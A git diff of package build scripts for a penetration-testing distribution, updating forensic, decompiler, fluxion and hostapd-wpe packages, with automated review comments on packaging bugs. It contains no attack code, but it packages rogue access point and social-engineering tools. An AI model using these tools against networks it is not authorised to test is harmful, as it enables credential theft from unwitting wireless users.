diff --git a/packages/libs/perl/perl-getopt-long/PKGBUILD b/packages/libs/perl/perl-getopt-long/PKGBUILD
index 5446fe628..686c8f238 100644
--- a/packages/libs/perl/perl-getopt-long/PKGBUILD
+++ b/packages/libs/perl/perl-getopt-long/PKGBUILD
@@ -3,8 +3,8 @@
 pkgname=perl-getopt-long
 _pkgname=Getopt-Long
-pkgver=2.51
-pkgrel=4
+pkgver=2.58
+pkgrel=1
 pkgdesc='Extended processing of command line options.'
 arch=('any')
 url='https://metacpan.org/pod/Getopt::Long'
@@ -12,7 +12,7 @@ license=('PerlArtistic' 'GPL')
 options=('!emptydirs')
 depends=('perl>=0')
 source=("http://search.cpan.org/CPAN/authors/id/J/JV/JV/$_pkgname-$pkgver.tar.gz")
-sha512sums=('e70b2c30f5f85d7bf387381782a22b55f76598e1b4e19102fbf463c4333e91090ad2da49965be6211821d4f7f109aa7e4153348a9142f38fdb1a39299c997c02')
+sha512sums=('c673b82a819533310d5697be7e0b009ed39fd02873d17b3f0e1eebab790c58faf5e0a6b1d79bf274e3ee9d35d43b355988dccae56ec9fcbc6822bcae7d7e2ef6')
 build() {
   cd "$_pkgname-$pkgver"
diff --git a/packages/pentesting/autopsy/PKGBUILD b/packages/pentesting/autopsy/PKGBUILD
index e9148d815..6ed80534a 100644
--- a/packages/pentesting/autopsy/PKGBUILD
+++ b/packages/pentesting/autopsy/PKGBUILD
@@ -4,15 +4,14 @@
 pkgname=autopsy
 pkgver=4.21.0
 _skver=4.12.1
-pkgrel=1
+pkgrel=2
 epoch=1
 pkgdesc='The forensic browser. A GUI for the Sleuth Kit.'
 groups=('athena' 'athena-forensic')
 arch=('x86_64')
 url='https://github.com/sleuthkit/autopsy'
 license=('MIT' 'Apache')
-depends=('java-runtime' 'testdisk' 'sleuthkit' 'sleuthkit-java' 'python2-pytsk3'
-         'python-pytsk3')
+depends=('java-runtime' 'testdisk' 'sleuthkit' 'sleuthkit-java' 'python-pytsk3')
 source=("https://github.com/sleuthkit/autopsy/releases/download/$pkgname-$pkgver/$pkgname-$pkgver.zip" "$pkgname.desktop")
 sha512sums=('ce84748f1d0fc51d2015aac0a15a291262d6f50a157d2d8ba30f78450dca1a9620016e18604789179beba4a92d26b6b823825ca61ece643fcecb6f2b8c172c8f'
@@ -40,4 +39,3 @@ package() {
   ln -sf "/opt/$pkgname/bin/$pkgname" "$pkgdir/usr/bin/$pkgname"
 }
-
diff --git a/packages/pentesting/dnspy/PKGBUILD b/packages/pentesting/dnspy/PKGBUILD
index a3d8e1672..96d75f2e1 100644
--- a/packages/pentesting/dnspy/PKGBUILD
+++ b/packages/pentesting/dnspy/PKGBUILD
@@ -3,7 +3,7 @@
 pkgname=dnspy
 pkgver=6.1.8
-pkgrel=1
+pkgrel=2
 pkgdesc='.NET debugger and assembly editor.'
 url='https://github.com/0xd4d/dnSpy/'
 groups=('athena' 'athena-windows' 'athena-decompiler'
@@ -19,6 +19,6 @@ package() {
   rm "$pkgname-$pkgver.zip"
-  cp -a * "$pkgdir/usr/share/windows/$pkgname/"
+  cp -a "dnSpy-$pkgver"/* "$pkgdir/usr/share/windows/$pkgname/"
 }
diff --git a/packages/pentesting/fluxion/PKGBUILD b/packages/pentesting/fluxion/PKGBUILD
index 619c9fa1f..34770a568 100644
--- a/packages/pentesting/fluxion/PKGBUILD
+++ b/packages/pentesting/fluxion/PKGBUILD
@@ -2,9 +2,9 @@
 # See COPYING for license details.
 pkgname=fluxion
-pkgver=1571.4f461a4
-pkgrel=2
-epoch=3
+pkgver=v4.10.r240.g4f461a4
+pkgrel=1
+epoch=4
 pkgdesc='A security auditing and social-engineering research tool.'
 arch=('any')
 groups=('athena' 'athena-social' 'athena-wireless')
@@ -12,8 +12,8 @@ url='https://github.com/FluxionNetwork/fluxion'
 license=('GPL3')
 source=("git+https://github.com/FluxionNetwork/$pkgname.git")
 depends=('aircrack-ng' 'bash>=4.2' 'coreutils' 'awk' 'iw' 'unzip' 'curl' 'bc'
-         'xterm' 'cowpatty' 'dhcp' 'p7zip' 'hostapd' 'lighttpd' 'macchanger'
-         'mdk3' 'mdk4' 'nmap' 'php-cgi' 'xorg-xdpyinfo')
+         'xterm' 'cowpatty' 'dhcp' 'dsniff' 'p7zip' 'hostapd' 'lighttpd'
+         'macchanger' 'mdk3' 'mdk4' 'nmap' 'php-cgi' 'xorg-xdpyinfo')
 makedepends=('binutils' 'coreutils' 'git')
 sha512sums=('SKIP')
@@ -24,7 +24,12 @@ prepare() {
 pkgver() {
   cd $pkgname
-  echo $(git rev-list --count HEAD).$(git rev-parse --short HEAD)
+  ( set -o pipefail
+    git describe --long --tags --abbrev=7 2>/dev/null |
+      sed 's/\([^-]*-g\)/r\1/;s/-/./g' ||
+    printf "%s.%s" "$(git rev-list --count HEAD)" \
+      "$(git rev-parse --short=7 HEAD)"
+  )
 }
 package() {
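Review bot: The new `cp -a "dnSpy-$pkgver"/*` in the dnspy package() hunk relies on a shell glob, which never matches names beginning with a dot, so any dot-file at the top of the extracted directory is silently left out of the package; the old `cp -a *` had the same gap, so this is not a regression, but the rewrite is the moment to close it with `cp -a "dnSpy-$pkgver"/. "$pkgdir/usr/share/windows/$pkgname/"`. That the archive unpacks into `dnSpy-$pkgver` is only inferred from the new line and is worth a one-line comment above it, e.g. `# the release zip unpacks into dnSpy-<version>/`. package() begins before this hunk.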
@@ -34,7 +39,7 @@ package() {
   install -dm 755 "$pkgdir/usr/share/$pkgname"
   install -Dm 644 -t "$pkgdir/usr/share/doc/$pkgname/" *.md
-  install -Dm 644 -t "$pkgdir/usr/share/man/man1/" docs/man/fluxion.1
+  install -Dm 644 -t "$pkgdir/usr/share/man/man1/" "docs/man/$pkgname.1"
   install -Dm 644 LICENSE "$pkgdir/usr/share/licenses/$pkgname/LICENSE"
   rm -rf *.md .git* *.yml .project .editorconfig
diff --git a/packages/pentesting/hostapd-wpe/0001_adj-wpe.patch b/packages/pentesting/hostapd-wpe/0001_adj-wpe.patch
new file mode 100644
index 000000000..32cb35d20
--- /dev/null
+++ b/packages/pentesting/hostapd-wpe/0001_adj-wpe.patch
@@ -0,0 +1,93 @@ +--- a/hostapd-2.11-wpe.patch ++++ b/hostapd-2.11-wpe.patch +@@ -3399,8 +3399,8 @@ + "User space daemon for IEEE 802.11 AP management,\n" + "IEEE 802.1X/WPA/WPA2/EAP/RADIUS Authenticator\n" + "Copyright (c) 2002-2024, Jouni Malinen " +-- "and contributors\n", +-+ "and contributors\n" ++- "and contributors\n", +++ "and contributors\n" + + "-----------------------------------------------------\n" + + "WPE (Wireless Pwnage Edition)\n" + + "This version has been cleverly modified to target\n" +@@ -3567,15 +3567,7 @@ + diff '--color=auto' -rupN hostapd-2.11/src/crypto/tls_openssl.c hostapd-2.11-wpe/src/crypto/tls_openssl.c + --- hostapd-2.11/src/crypto/tls_openssl.c 2024-07-26 12:31:12.300000000 +0000 + +++ hostapd-2.11-wpe/src/crypto/tls_openssl.c 2024-07-26 12:33:34.152000000 +0000 +-@@ -29,7 +29,6 @@ +- #include +- #include +- #include +--#include +- #if OPENSSL_VERSION_NUMBER >= 0x30000000L +- #include +- #include +-@@ -50,6 +49,7 @@ ++@@ -49,6 +49,7 @@ + #include "sha256.h" + #include "tls.h" + #include "tls_openssl.h" +@@ -3583,7 +3575,7 @@ + + #if !defined(CONFIG_FIPS) && \ + (defined(EAP_FAST) || defined(EAP_FAST_DYNAMIC) || \ +-@@ -205,6 +205,10 @@ static int tls_add_ca_from_keystore_enco ++@@ -204,6 +205,10 @@ static int tls_add_ca_from_keystore_enco + + #endif /* ANDROID */ + +@@ -3594,7 +3586,7 @@ + static int tls_openssl_ref_count = 0; + static int tls_ex_idx_session = -1; + +-@@ -1724,7 +1728,12 @@ struct tls_connection * tls_connection_i ++@@ -1723,7 +1728,12 @@ struct tls_connection * tls_connection_i + + conn->context = context; + SSL_set_app_data(conn->ssl, conn); +@@ -3608,7 +3600,7 @@ + SSL_set_msg_callback_arg(conn->ssl, conn); + options = SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3 | + SSL_OP_SINGLE_DH_USE; +-@@ -4501,6 +4510,10 @@ openssl_handshake(struct tls_connection ++@@ -4500,6 +4510,10 @@ openssl_handshake(struct tls_connection + struct tls_context *context = conn->context; + int res; + struct wpabuf *out_data; +@@ -3619,7 +3611,7 @@ 
+ + /* + * Give TLS handshake data from the server (if available) to OpenSSL +-@@ -4619,6 +4632,30 @@ openssl_handshake(struct tls_connection ++@@ -4618,6 +4632,30 @@ openssl_handshake(struct tls_connection + } + wpabuf_put(out_data, res); + +@@ -3650,7 +3642,7 @@ + return out_data; + } + +-@@ -4751,6 +4788,13 @@ struct wpabuf * tls_connection_encrypt(v ++@@ -4750,6 +4788,13 @@ struct wpabuf * tls_connection_encrypt(v + tls_show_errors(MSG_INFO, __func__, "BIO_reset failed"); + return NULL; + } +@@ -3664,7 +3656,7 @@ + res = SSL_write(conn->ssl, wpabuf_head(in_data), wpabuf_len(in_data)); + if (res < 0) { + tls_show_errors(MSG_INFO, __func__, +-@@ -4758,6 +4802,12 @@ struct wpabuf * tls_connection_encrypt(v ++@@ -4757,6 +4802,12 @@ struct wpabuf * tls_connection_encrypt(v + return NULL; + } + +@@ -3677,7 +3669,7 @@ + /* Read encrypted data to be sent to the server */ + buf = wpabuf_alloc(wpabuf_len(in_data) + 300); + if (buf == NULL) +-@@ -6028,3 +6078,69 @@ bool tls_connection_get_own_cert_used(st ++@@ -6027,3 +6078,68 @@ bool tls_connection_get_own_cert_used(st + return SSL_get_certificate(conn->ssl) != NULL; + return false; + } diff --git a/packages/pentesting/hostapd-wpe/PKGBUILD b/packages/pentesting/hostapd-wpe/PKGBUILD index fd8e88b45..9df0fbcf6 100644 --- a/packages/pentesting/hostapd-wpe/PKGBUILD +++ b/packages/pentesting/hostapd-wpe/PKGBUILD 
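Review bot: 0001_adj-wpe.patch carries no explanation of what it corrects, and since `patch` ignores free text before the first `---` header, a short preamble at the top of the file is the place to record it: that the aircrack-ng patch's `tls_openssl.c` hunk `@@ -29,7 +29,6 @@` deletes an `#include` line that appears not to exist in the `hostap_2_11` tag the PKGBUILD now checks out, so that hunk is dropped and the old-side offsets of the following hunks shift down by one. The last adjusted header also changes the new-side count from `+6078,69` to `+6078,68` while nothing in this file removes an added line from that hunk; if the upstream hunk really contains 69 `+` lines, GNU patch will reject the adjusted file as malformed, so either the upstream count was simply wrong (worth stating in the preamble) or a removal is missing here. Recording the reason for each header edit is what the next version bump will need, because this adjustment has to be regenerated whenever the aircrack-ng patch or the hostapd tag changes.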
@@ -1,48 +1,42 @@
 # Credits BlackArch ( https://www.blackarch.org/ ).
 # See COPYING for license details.
-# NOTE: initially ripped from AUR, but we changed a lot here (style).
-
 pkgname=hostapd-wpe
-_pkgname=hostapd
-pkgver=2.9.1
-_pkgver=2.9
-pkgrel=3
-groups=('athena' 'athena-wireless')
+_pkgname=hostap
+pkgver=2.11
+pkgrel=1
 pkgdesc='Modified hostapd to facilitate AP impersonation attacks.'
+groups=('athena' 'athena-wireless')
 arch=('x86_64' 'aarch64')
 url='https://w1.fi/hostapd/'
-license=('BSD')
-depends=('openssl-1.0' 'libnl' 'sqlite')
-source=("https://w1.fi/releases/$_pkgname-$_pkgver.tar.gz"
-        "https://patches.aircrack-ng.org/wpe/hostapd-wpe/$pkgname.patch")
-# "https://raw.githubusercontent.com/aircrack-ng/aircrack-ng/master/patches/wpe/hostapd-wpe/$pkgname.patch")
-install="$pkgname.install"
-sha512sums=('66c729380152db18b64520bda55dfa00af3b0264f97b5de100b81a46e2593571626c4bdcf900f0988ea2131e30bc8788f75d8489dd1f57e37fd56e8098e48a9c'
-            'c1ef9f6b9b3d3d04fa98fb9568acc45a5c52a00411a5ebbbf3a80835cc27f6cdc5003343f37964fbac2c7c1fefffdf999d620f0e39797c0c37030090735526a5')
+license=('BSD-3-Clause')
+depends=('glibc' 'libnl' 'openssl-1.0' 'sqlite')
+makedepends=('git')
+source=("git+https://w1.fi/$_pkgname.git?signed#tag=${_pkgname}_${pkgver//./_}"
+        '0001_adj-wpe.patch'
+        "https://raw.githubusercontent.com/aircrack-ng/aircrack-ng/master/patches/wpe/$pkgname/${_pkgname}d-$pkgver-wpe.patch")
+sha512sums=('de2ba10af60bc88f0f900fe4a90681d9f08318bf12f88227881f6c4f2c4c628b89515a5425242048b8867b1791f5613fbfa1c3adeecf345aeb4093cac5eb62e4'
+            '30cb5301c0ee90ae8e1dd9f17b27e0b6ee253919251bb8cc6da3b340e632607915f30952e17e9e4cf9adc3ee062354e4b7bd55ddddc82753050dcba7ef9cd646'
+            'c46fbd8a10045d8df09f28b37992c32b9f34604d380ff47a0158ef3afcf9b406f8788ddd8e5e1cc2478f4800de2417504d756b11ccf9628046dd8a150e1fd44c')
+validpgpkeys=(EC4AA0A991A5F2464582D52D2B6EF432EFC895FA) # Jouni Malinen
 prepare() {
-  cd "$_pkgname-$_pkgver"
+  # Adjust aircrack-ng patch as it doesn't cleanly apply
+  patch -Np1 --follow-symlinks -i "${srcdir}"/0001_adj-wpe.patch
-  patch -p1 -i "$srcdir/$pkgname.patch"
+  # Apply aircrack-ng patch
+  patch -Np1 -d $_pkgname -i "${srcdir}"/${_pkgname}d-${pkgver}-wpe.patch
 }
 build() {
-  cd "$_pkgname-$_pkgver/$_pkgname"
-
-  make
+  make -C $_pkgname/${_pkgname}d
 }
 package() {
-  cd "$_pkgname-$_pkgver/$_pkgname"
-
-  make DESTDIR="$pkgdir" install
-  make DESTDIR="$pkgdir" wpe
+  cd $_pkgname
-  install -Dm 644 "$srcdir/$_pkgname-$_pkgver/COPYING" \
-    "$pkgdir/usr/share/licenses/$pkgname/COPYING"
+  make -C ${_pkgname}d install DESTDIR="$pkgdir" BINDIR=/usr/bin
-  mv "$pkgdir/usr/local/bin" "$pkgdir/usr/bin"
-  rmdir "$pkgdir/usr/local"
+  install -vDm 644 COPYING -t "$pkgdir/usr/share/licenses/$pkgname/"
 }
diff --git a/packages/pentesting/hostapd-wpe/hostapd-2.11-wpe.patch b/packages/pentesting/hostapd-wpe/hostapd-2.11-wpe.patch
new file mode 100644
index 000000000..34b195315
--- /dev/null
+++ b/packages/pentesting/hostapd-wpe/hostapd-2.11-wpe.patch
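Review bot: The rewritten package() drops the `make DESTDIR="$pkgdir" wpe` call that the old body ran, and in the patched hostapd/Makefile the `wpe` target is what installs `hostapd-wpe.conf`, `hostapd-wpe.eap_user` and the `certs/` tree under /etc/hostapd-wpe while `install` only places `$(ALL)`, so the new package ships the binaries without their configuration; add `make -C ${_pkgname}d wpe DESTDIR="$pkgdir"` after the install line. The commit also vendors packages/pentesting/hostapd-wpe/hostapd-2.11-wpe.patch, yet the source array still fetches `${_pkgname}d-$pkgver-wpe.patch` from the aircrack-ng `master` branch, so the pinned sha512sum will fail as soon as upstream edits that file and the local copy is never used; pointing the entry at the local file (`"${_pkgname}d-$pkgver-wpe.patch"`) makes the build reproducible and keeps the checksum meaningful. `depends` keeps `openssl-1.0` although the tls_openssl.c context in the patch carries `OPENSSL_VERSION_NUMBER >= 0x30000000L` branches and nothing visible in the build sets CFLAGS/LIBS toward a 1.0 tree, so the binary presumably links against the system OpenSSL; confirm which library is actually linked and drop the end-of-life 1.0 dependency if it is unused. A one-line comment next to `'0001_adj-wpe.patch'` in source, e.g. `# rebases the aircrack-ng patch onto the hostap_2_11 tag`, would also say why a patch-of-a-patch exists, which the prepare() comment only hints at.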
@@ -0,0 +1,4222 @@ +diff '--color=auto' -rupN hostapd-2.11/hostapd/.config hostapd-2.11-wpe/hostapd/.config +--- hostapd-2.11/hostapd/.config 1970-01-01 00:00:00.000000000 +0000 ++++ hostapd-2.11-wpe/hostapd/.config 2024-07-26 09:11:33.196000000 +0000 +@@ -0,0 +1,416 @@ ++# Wireless Pawn Edition HostAPd configuration file ++# ++# This file lists the configuration options that are used when building the ++# hostapd binary. All lines starting with # are ignored. Configuration option ++# lines must be commented out complete, if they are not to be included, i.e., ++# just setting VARIABLE=n is not disabling that variable. ++# ++# This file is included in Makefile, so variables like CFLAGS and LIBS can also ++# be modified from here. In most cass, these lines should use += in order not ++# to override previous values of the variables. ++ ++# Driver interface for Host AP driver ++CONFIG_DRIVER_HOSTAP=y ++ ++# Driver interface for wired authenticator ++CONFIG_DRIVER_WIRED=y ++ ++# Driver interface for drivers using the nl80211 kernel interface ++CONFIG_DRIVER_NL80211=y ++ ++# QCA vendor extensions to nl80211 ++CONFIG_DRIVER_NL80211_QCA=y ++ ++# driver_nl80211.c requires libnl. If you are compiling it yourself ++# you may need to point hostapd to your version of libnl. ++# ++#CFLAGS += -I$ ++#LIBS += -L$ ++ ++# Use libnl v2.0 (or 3.0) libraries. 
++#CONFIG_LIBNL20=y ++ ++# Use libnl 3.2 libraries (if this is selected, CONFIG_LIBNL20 is ignored) ++CONFIG_LIBNL32=y ++ ++ ++# Driver interface for FreeBSD net80211 layer (e.g., Atheros driver) ++#CONFIG_DRIVER_BSD=y ++#CFLAGS += -I/usr/local/include ++#LIBS += -L/usr/local/lib ++#LIBS_p += -L/usr/local/lib ++#LIBS_c += -L/usr/local/lib ++ ++# Driver interface for no driver (e.g., RADIUS server only) ++#CONFIG_DRIVER_NONE=y ++ ++# WPA2/IEEE 802.11i RSN pre-authentication ++CONFIG_RSN_PREAUTH=y ++ ++# Support Operating Channel Validation ++#CONFIG_OCV=y ++ ++# Integrated EAP server ++CONFIG_EAP=y ++ ++# EAP Re-authentication Protocol (ERP) in integrated EAP server ++CONFIG_ERP=y ++ ++# EAP-MD5 for the integrated EAP server ++CONFIG_EAP_MD5=y ++ ++# EAP-TLS for the integrated EAP server ++CONFIG_EAP_TLS=y ++ ++# EAP-MSCHAPv2 for the integrated EAP server ++CONFIG_EAP_MSCHAPV2=y ++ ++# EAP-PEAP for the integrated EAP server ++CONFIG_EAP_PEAP=y ++ ++# EAP-GTC for the integrated EAP server ++CONFIG_EAP_GTC=y ++ ++# EAP-TTLS for the integrated EAP server ++CONFIG_EAP_TTLS=y ++ ++# EAP-SIM for the integrated EAP server ++CONFIG_EAP_SIM=y ++ ++# EAP-AKA for the integrated EAP server ++CONFIG_EAP_AKA=y ++ ++# EAP-AKA' for the integrated EAP server ++# This requires CONFIG_EAP_AKA to be enabled, too. 
++CONFIG_EAP_AKA_PRIME=y ++ ++# EAP-PAX for the integrated EAP server ++CONFIG_EAP_PAX=y ++ ++# EAP-PSK for the integrated EAP server (this is _not_ needed for WPA-PSK) ++CONFIG_EAP_PSK=y ++ ++# EAP-pwd for the integrated EAP server (secure authentication with a password) ++CONFIG_EAP_PWD=y ++ ++# EAP-SAKE for the integrated EAP server ++CONFIG_EAP_SAKE=y ++ ++# EAP-GPSK for the integrated EAP server ++CONFIG_EAP_GPSK=y ++# Include support for optional SHA256 cipher suite in EAP-GPSK ++CONFIG_EAP_GPSK_SHA256=y ++ ++# EAP-FAST for the integrated EAP server ++CONFIG_EAP_FAST=y ++ ++# EAP-TEAP for the integrated EAP server ++# Note: The current EAP-TEAP implementation is experimental and should not be ++# enabled for production use. The IETF RFC 7170 that defines EAP-TEAP has number ++# of conflicting statements and missing details and the implementation has ++# vendor specific workarounds for those and as such, may not interoperate with ++# any other implementation. This should not be used for anything else than ++# experimentation and interoperability testing until those issues has been ++# resolved. ++CONFIG_EAP_TEAP=y ++ ++# Wi-Fi Protected Setup (WPS) ++CONFIG_WPS=y ++# Enable UPnP support for external WPS Registrars ++CONFIG_WPS_UPNP=y ++# Enable WPS support with NFC config method ++CONFIG_WPS_NFC=y ++ ++# EAP-IKEv2 ++CONFIG_EAP_IKEV2=y ++ ++# Trusted Network Connect (EAP-TNC) ++CONFIG_EAP_TNC=y ++ ++# EAP-EKE for the integrated EAP server ++CONFIG_EAP_EKE=y ++ ++# PKCS#12 (PFX) support (used to read private key and certificate file from ++# a file that usually has extension .p12 or .pfx) ++CONFIG_PKCS12=y ++ ++# RADIUS authentication server. This provides access to the integrated EAP ++# server from external hosts using RADIUS. 
++CONFIG_RADIUS_SERVER=y ++ ++# Build IPv6 support for RADIUS operations ++CONFIG_IPV6=y ++ ++# IEEE Std 802.11r-2008 (Fast BSS Transition) ++CONFIG_IEEE80211R=y ++ ++# Use the hostapd's IEEE 802.11 authentication (ACL), but without ++# the IEEE 802.11 Management capability (e.g., FreeBSD/net80211) ++CONFIG_DRIVER_RADIUS_ACL=y ++ ++# Wireless Network Management (IEEE Std 802.11v-2011) ++# Note: This is experimental and not complete implementation. ++CONFIG_WNM=y ++ ++# IEEE 802.11ac (Very High Throughput) support ++CONFIG_IEEE80211AC=y ++ ++# IEEE 802.11ax HE support ++# Note: This is experimental and work in progress. The definitions are still ++# subject to change and this should not be expected to interoperate with the ++# final IEEE 802.11ax version. ++CONFIG_IEEE80211AX=y ++ ++# Remove debugging code that is printing out debug messages to stdout. ++# This can be used to reduce the size of the hostapd considerably if debugging ++# code is not needed. ++#CONFIG_NO_STDOUT_DEBUG=y ++ ++# Add support for writing debug log to a file: -f /tmp/hostapd.log ++# Disabled by default. ++CONFIG_DEBUG_FILE=y ++ ++# Send debug messages to syslog instead of stdout ++CONFIG_DEBUG_SYSLOG=y ++ ++# Add support for sending all debug messages (regardless of debug verbosity) ++# to the Linux kernel tracing facility. This helps debug the entire stack by ++# making it easy to record everything happening from the driver up into the ++# same file, e.g., using trace-cmd. ++CONFIG_DEBUG_LINUX_TRACING=y ++ ++# Remove support for RADIUS accounting ++#CONFIG_NO_ACCOUNTING=y ++ ++# Remove support for RADIUS ++#CONFIG_NO_RADIUS=y ++ ++# Remove support for VLANs ++#CONFIG_NO_VLAN=y ++ ++# Enable support for fully dynamic VLANs. This enables hostapd to ++# automatically create bridge and VLAN interfaces if necessary. ++#CONFIG_FULL_DYNAMIC_VLAN=y ++ ++# Use netlink-based kernel API for VLAN operations instead of ioctl() ++# Note: This requires libnl 3.1 or newer. 
++#CONFIG_VLAN_NETLINK=y ++ ++# Remove support for dumping internal state through control interface commands ++# This can be used to reduce binary size at the cost of disabling a debugging ++# option. ++#CONFIG_NO_DUMP_STATE=y ++ ++# Enable tracing code for developer debugging ++# This tracks use of memory allocations and other registrations and reports ++# incorrect use with a backtrace of call (or allocation) location. ++#CONFIG_WPA_TRACE=y ++# For BSD, comment out these. ++#LIBS += -lexecinfo ++#LIBS_p += -lexecinfo ++#LIBS_c += -lexecinfo ++ ++# Use libbfd to get more details for developer debugging ++# This enables use of libbfd to get more detailed symbols for the backtraces ++# generated by CONFIG_WPA_TRACE=y. ++#CONFIG_WPA_TRACE_BFD=y ++# For BSD, comment out these. ++#LIBS += -lbfd -liberty -lz ++#LIBS_p += -lbfd -liberty -lz ++#LIBS_c += -lbfd -liberty -lz ++ ++# hostapd depends on strong random number generation being available from the ++# operating system. os_get_random() function is used to fetch random data when ++# needed, e.g., for key generation. On Linux and BSD systems, this works by ++# reading /dev/urandom. It should be noted that the OS entropy pool needs to be ++# properly initialized before hostapd is started. This is important especially ++# on embedded devices that do not have a hardware random number generator and ++# may by default start up with minimal entropy available for random number ++# generation. ++# ++# As a safety net, hostapd is by default trying to internally collect ++# additional entropy for generating random data to mix in with the data ++# fetched from the OS. This by itself is not considered to be very strong, but ++# it may help in cases where the system pool is not initialized properly. ++# However, it is very strongly recommended that the system pool is initialized ++# with enough entropy either by using hardware assisted random number ++# generator or by storing state over device reboots. 
++# ++# hostapd can be configured to maintain its own entropy store over restarts to ++# enhance random number generation. This is not perfect, but it is much more ++# secure than using the same sequence of random numbers after every reboot. ++# This can be enabled with -e command line option. The specified ++# file needs to be readable and writable by hostapd. ++# ++# If the os_get_random() is known to provide strong random data (e.g., on ++# Linux/BSD, the board in question is known to have reliable source of random ++# data from /dev/urandom), the internal hostapd random pool can be disabled. ++# This will save some in binary size and CPU use. However, this should only be ++# considered for builds that are known to be used on devices that meet the ++# requirements described above. ++#CONFIG_NO_RANDOM_POOL=y ++ ++# Should we attempt to use the getrandom(2) call that provides more reliable ++# yet secure randomness source than /dev/random on Linux 3.17 and newer. ++# Requires glibc 2.25 to build, falls back to /dev/random if unavailable. ++#CONFIG_GETRANDOM=y ++ ++# Should we use poll instead of select? Select is used by default. ++#CONFIG_ELOOP_POLL=y ++ ++# Should we use epoll instead of select? Select is used by default. ++#CONFIG_ELOOP_EPOLL=y ++ ++# Should we use kqueue instead of select? Select is used by default. ++#CONFIG_ELOOP_KQUEUE=y ++ ++# Select TLS implementation ++# openssl = OpenSSL (default) ++# gnutls = GnuTLS ++# internal = Internal TLSv1 implementation (experimental) ++# linux = Linux kernel AF_ALG and internal TLSv1 implementation (experimental) ++# none = Empty template ++#CONFIG_TLS=openssl ++ ++# TLS-based EAP methods require at least TLS v1.0. Newer version of TLS (v1.1) ++# can be enabled to get a stronger construction of messages when block ciphers ++# are used. ++CONFIG_TLSV11=y ++ ++# TLS-based EAP methods require at least TLS v1.0. Newer version of TLS (v1.2) ++# can be enabled to enable use of stronger crypto algorithms. 
++CONFIG_TLSV12=y ++ ++# Select which ciphers to use by default with OpenSSL if the user does not ++# specify them. ++CONFIG_TLS_DEFAULT_CIPHERS="ALL" ++ ++# If CONFIG_TLS=internal is used, additional library and include paths are ++# needed for LibTomMath. Alternatively, an integrated, minimal version of ++# LibTomMath can be used. See beginning of libtommath.c for details on benefits ++# and drawbacks of this option. ++#CONFIG_INTERNAL_LIBTOMMATH=y ++#ifndef CONFIG_INTERNAL_LIBTOMMATH ++#LTM_PATH=/usr/src/libtommath-0.39 ++#CFLAGS += -I$(LTM_PATH) ++#LIBS += -L$(LTM_PATH) ++#LIBS_p += -L$(LTM_PATH) ++#endif ++# At the cost of about 4 kB of additional binary size, the internal LibTomMath ++# can be configured to include faster routines for exptmod, sqr, and div to ++# speed up DH and RSA calculation considerably ++CONFIG_INTERNAL_LIBTOMMATH_FAST=y ++ ++# Interworking (IEEE 802.11u) ++# This can be used to enable functionality to improve interworking with ++# external networks. ++CONFIG_INTERWORKING=y ++ ++# Hotspot 2.0 ++CONFIG_HS20=y ++ ++# Enable SQLite database support in hlr_auc_gw, EAP-SIM DB, and eap_user_file ++CONFIG_SQLITE=y ++ ++# Enable Fast Session Transfer (FST) ++CONFIG_FST=y ++ ++# Enable CLI commands for FST testing ++#CONFIG_FST_TEST=y ++ ++# Testing options ++# This can be used to enable some testing options (see also the example ++# configuration file) that are really useful only for testing clients that ++# connect to this hostapd. These options allow, for example, to drop a ++# certain percentage of probe requests or auth/(re)assoc frames. ++# ++CONFIG_TESTING_OPTIONS=y ++ ++# Automatic Channel Selection ++# This will allow hostapd to pick the channel automatically when channel is set ++# to "acs_survey" or "0". Eventually, other ACS algorithms can be added in ++# similar way. 
++# ++# Automatic selection is currently only done through initialization, later on ++# we hope to do background checks to keep us moving to more ideal channels as ++# time goes by. ACS is currently only supported through the nl80211 driver and ++# your driver must have survey dump capability that is filled by the driver ++# during scanning. ++# ++# You can customize the ACS survey algorithm with the hostapd.conf variable ++# acs_num_scans. ++# ++# Supported ACS drivers: ++# * ath9k ++# * ath5k ++# * ath10k ++# ++# For more details refer to: ++# https://wireless.wiki.kernel.org/en/users/documentation/acs ++# ++CONFIG_ACS=y ++ ++# Multiband Operation support ++# These extensions facilitate efficient use of multiple frequency bands ++# available to the AP and the devices that may associate with it. ++CONFIG_MBO=y ++ ++# Client Taxonomy ++# Has the AP retain the Probe Request and (Re)Association Request frames from ++# a client, from which a signature can be produced which can identify the model ++# of client device like "Nexus 6P" or "iPhone 5s". ++CONFIG_TAXONOMY=y ++ ++# Fast Initial Link Setup (FILS) (IEEE 802.11ai) ++CONFIG_FILS=y ++# FILS shared key authentication with PFS ++CONFIG_FILS_SK_PFS=y ++ ++# Include internal line edit mode in hostapd_cli. This can be used to provide ++# limited command line editing and history support. ++CONFIG_WPA_CLI_EDIT=y ++ ++# Opportunistic Wireless Encryption (OWE) ++# Experimental implementation of draft-harkins-owe-07.txt ++CONFIG_OWE=y ++ ++# Airtime policy support ++CONFIG_AIRTIME_POLICY=y ++ ++# Override default value for the wpa_disable_eapol_key_retries configuration ++# parameter. See that parameter in hostapd.conf for more details. ++#CFLAGS += -DDEFAULT_WPA_DISABLE_EAPOL_KEY_RETRIES=1 ++ ++# Wired equivalent privacy (WEP) ++# WEP is an obsolete cryptographic data confidentiality algorithm that is not ++# considered secure. It should not be used for anything anymore. 
The ++# functionality needed to use WEP is available in the current hostapd ++# release under this optional build parameter. This functionality is subject to ++# be completely removed in a future release. ++CONFIG_WEP=y ++ ++# Remove all TKIP functionality ++# TKIP is an old cryptographic data confidentiality algorithm that is not ++# considered secure. It should not be used anymore. For now, the default hostapd ++# build includes this to allow mixed mode WPA+WPA2 networks to be enabled, but ++# that functionality is subject to be removed in the future. ++#CONFIG_NO_TKIP=y ++ ++# Pre-Association Security Negotiation (PASN) ++# Experimental implementation based on IEEE P802.11z/D2.6 and the protocol ++# design is still subject to change. As such, this should not yet be enabled in ++# production use. ++# This requires CONFIG_IEEE80211W=y to be enabled, too. ++CONFIG_PASN=y ++CONFIG_IEEE80211W=y ++ ++# Device Provisioning Protocol (DPP) (also known as Wi-Fi Easy Connect) ++CONFIG_DPP=y ++# DPP version 2 support ++CONFIG_DPP2=y ++# DPP version 3 support (experimental and still changing; do not enable for ++# production use) ++CONFIG_DPP3=y ++ ++# Forgotten/lost somewhere ++CONFIG_SAE=y +diff '--color=auto' -rupN hostapd-2.11/hostapd/Makefile hostapd-2.11-wpe/hostapd/Makefile +--- hostapd-2.11/hostapd/Makefile 2024-07-20 18:04:37.000000000 +0000 ++++ hostapd-2.11-wpe/hostapd/Makefile 2024-07-26 12:17:15.692000000 +0000 +@@ -1,4 +1,4 @@ +-ALL=hostapd hostapd_cli 